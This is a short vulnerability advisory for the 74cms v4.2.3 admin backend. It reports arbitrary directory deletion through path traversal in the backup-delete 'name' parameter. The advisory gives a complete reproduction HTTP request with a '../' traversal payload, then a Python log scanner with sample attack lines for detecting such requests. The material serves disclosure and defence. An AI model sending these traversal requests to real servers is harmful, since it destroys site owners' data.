74cms v4.2.3 Arbitrary Directory Deletion


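Overview

When a backup file is deleted from the admin backend, the name parameter passed in is user-controllable, which allows arbitrary directories to be deleted.

Reproducing the vulnerability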

GET /74cms/index.php?m=admin&c=database&a=del&name=/../../../../test/ HTTP/1.1
Host: 192.161.15.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.161.15.5/74cms/index.php?m=admin&c=index&a=top_menu
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: think_template=default; PHPSESSID=aen9s0rkucruqsbbtrvph8hjs0; think_language=zh-CN
Connection: close

Root cause

/Application/Admin/Controller/DatabaseController.class.php

The name parameter passed in when deleting a backup file is user-controllable, which allows arbitrary directories to be deleted.
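A log check for the delete request shown in the reproduction section, as an added example that is not part of the original post or of 74cms: it scans web access logs for m=admin, c=database, a=del requests whose name value is path-like. The log lines, client IPs and the benign backup name are constructed, and both the case-insensitive route match and the rule that a legitimate backup name is a single path component are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format); not from the original post.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2020:10:00:01 +0800] "GET /74cms/index.php?m=admin&c=database&a=del&name=20200301-101500 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Mar/2020:10:02:13 +0800] "GET /74cms/index.php?m=admin&c=database&a=del&name=/../../../../test/ HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Mar/2020:10:02:40 +0800] "GET /74cms/index.php?a=del&c=Database&m=Admin&name=..%2F..%2Fdata HTTP/1.1" 200 498',
    '203.0.113.5 - - [01/Mar/2020:10:03:02 +0800] "GET /74cms/index.php?m=admin&c=index&a=top_menu HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, max_rounds=5):
    """Decode repeatedly so nested percent-encoding cannot hide separators."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious_name(name):
    """Assumption: a backup name is one path component, so no separators or '..'."""
    name = fully_unquote(name).replace("\\", "/")
    return "/" in name or ".." in name or "\x00" in name

def find_traversal_deletes(lines):
    """Return (client_ip, decoded_name) for database/del requests with a path-like name."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        q = {k: v[0] for k, v in parse_qs(urlsplit(m.group(1)).query).items()}
        # Assumption: module/controller/action values are matched case-insensitively.
        route = tuple(q.get(k, "").lower() for k in ("m", "c", "a"))
        if route != ("admin", "database", "del"):
            continue
        name = q.get("name", "")
        if is_suspicious_name(name):
            hits.append((line.split()[0], fully_unquote(name)))
    return hits

if __name__ == "__main__":
    for ip, name in find_traversal_deletes(SAMPLE_LOG):
        print(ip, name)
```

Only query-string parameters are visible in an access log, so a name value sent in a POST body would need request-body logging to be caught.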
